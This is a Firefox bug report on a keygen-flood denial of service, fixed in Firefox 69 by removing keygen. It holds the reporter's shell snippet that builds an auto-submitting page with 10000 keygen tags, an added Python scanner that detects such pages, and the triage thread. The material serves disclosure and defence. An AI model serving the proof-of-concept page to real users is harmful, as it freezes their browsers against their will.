Bug 1524559 (Closed) - Many keygen tags can make browser unusable
Opened 2 years ago, closed 2 years ago

Categories: Firefox :: Security, enhancement, P2
Status: RESOLVED FIXED
Target Milestone: Firefox 69

Tracking Status:
  firefox-esr60 --- wontfix
  firefox67 --- wontfix
  firefox68 --- wontfix
  firefox69 --- fixed

People: Reporter: hanno, Assigned: jkt
References: Blocks 1 open bug

Details
Keywords: csectype-dos, sec-low
Whiteboard: [fixed by bug 1315460][post-critsmash-triage][adv-main69-]

By creating an auto-sending form that contains a large number of keygen tags one can make the browser practically unusable, only recoverable by killing the browser.

Example:
# Build poc.html: one form holding 10000 <keygen> elements, submitted from
# script as soon as the page loads. Each keygen raises a window-modal dialog
# on submit, so the user cannot get the window back.
(
  echo '<form name=f>'
  for i in $(seq 1 10000); do echo '<keygen name=a>'; done
  echo '</form><script>document.f.submit();</script>'
) > poc.html

The popup created by keygen is window modal.

It's my understanding that keygen is planned for deprecation anyway, so maybe just accelerate the deprecation?
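The pattern in the report (one form, thousands of <keygen> elements, submitted from script) is easy to recognise in content before a browser ever renders it. The following is an added example, not the reporter's PoC and not Firefox code: a small Python scanner built on the standard-library html.parser that counts <keygen> elements per <form> and notes whether any inline script calls .submit(). The threshold of 10, the ".submit(" heuristic and the sample documents are assumptions constructed for this example.

```python
"""Flag forms that carry an unusual number of <keygen> elements and are
submitted from inline script.

Added example for this bug report; it is neither the reporter's PoC nor
Firefox code. KEYGEN_THRESHOLD, the ".submit(" heuristic and the sample
documents below are assumptions.
"""
from html.parser import HTMLParser

# Assumed threshold: a real certificate-enrolment page needs one <keygen>
# per form, so anything well above that is suspicious.
KEYGEN_THRESHOLD = 10


class KeygenFormScanner(HTMLParser):
    """Counts <keygen> per <form> and collects inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.forms = []         # one dict per form: {"name": str, "keygens": int}
        self.scripts = []       # text of each inline <script> element
        self._form = None       # the form currently open, if any
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._form = {"name": attrs.get("name") or attrs.get("id") or "",
                          "keygens": 0}
            self.forms.append(self._form)
        elif tag == "keygen":
            # <keygen> is a void element, so only its start tag is ever seen.
            if self._form is None:
                # Stray keygen outside any form: track it under an anonymous form.
                self._form = {"name": "", "keygens": 0}
                self.forms.append(self._form)
            self._form["keygens"] += 1
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser passes <script> bodies through handle_data unparsed.
        if self._in_script:
            self.scripts.append(data)


def scan(html, threshold=KEYGEN_THRESHOLD):
    """Return one finding per form whose keygen count exceeds threshold."""
    parser = KeygenFormScanner()
    parser.feed(html)
    parser.close()
    # Heuristic: any inline script calling .submit() counts as auto-submit.
    auto_submit = any(".submit(" in s for s in parser.scripts)
    findings = []
    for form in parser.forms:
        if form["keygens"] > threshold:
            findings.append({"form": form["name"],
                             "keygens": form["keygens"],
                             "auto_submit": auto_submit})
    return findings


# Constructed sample inputs, not captured from any real site.
FLOOD_HTML = ("<form name=f>" + "<keygen name=a>" * 10000
              + "</form><script>document.f.submit();</script>")
BENIGN_HTML = ("<form name=enrol><keygen name=spkac keytype=rsa>"
               "<input type=submit></form>")

if __name__ == "__main__":
    for label, doc in (("flood", FLOOD_HTML), ("benign", BENIGN_HTML)):
        print(label, scan(doc))
```

Running the module reports the constructed flood document as a single form with 10000 keygens and auto-submit set, and nothing for the benign one-keygen enrolment form. The scanner only sees static markup; a page that inserts keygens from script after load would need the check applied to the live DOM instead.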

Ah, great, another one. And this one seems pretty bad, too.

Dana, do you know about the state of that keygen dialog? Can we remove it/pref it off? Otherwise we can just try and make it tab modal or rate-limit it.

Flags: needinfo?(dkeeler)
Keywords: csectype-dos
Priority: -- → P2

I'm not aware of a pref to turn it off, but I believe :jkt was working on removing it. We should just go ahead with that.

Flags: needinfo?(dkeeler) → needinfo?(jkt)
Keywords: sec-low

Seems like removing it is underway; we should close this bug once bug 1315460 lands on central.

Depends on: 1315460
Flags: needinfo?(jkt)
Assignee: nobody → jkt
Status: NEW → RESOLVED
Closed: 2 years ago
Resolution: --- → FIXED
Whiteboard: [fixed by bug 1315460]
Group: firefox-core-security → core-security-release
Target Milestone: --- → Firefox 69
Flags: qe-verify-
Whiteboard: [fixed by bug 1315460] → [fixed by bug 1315460][post-critsmash-triage]
Alias: CVE-2019-11739
Whiteboard: [fixed by bug 1315460][post-critsmash-triage] → [fixed by bug 1315460][post-critsmash-triage][adv-main69-]

After discussion, we decided that as a DOS, this won't receive a CVE or an advisory (as we generally do neither for DOS issues). Apologies for any confusion.

Alias: CVE-2019-11739
Group: core-security-release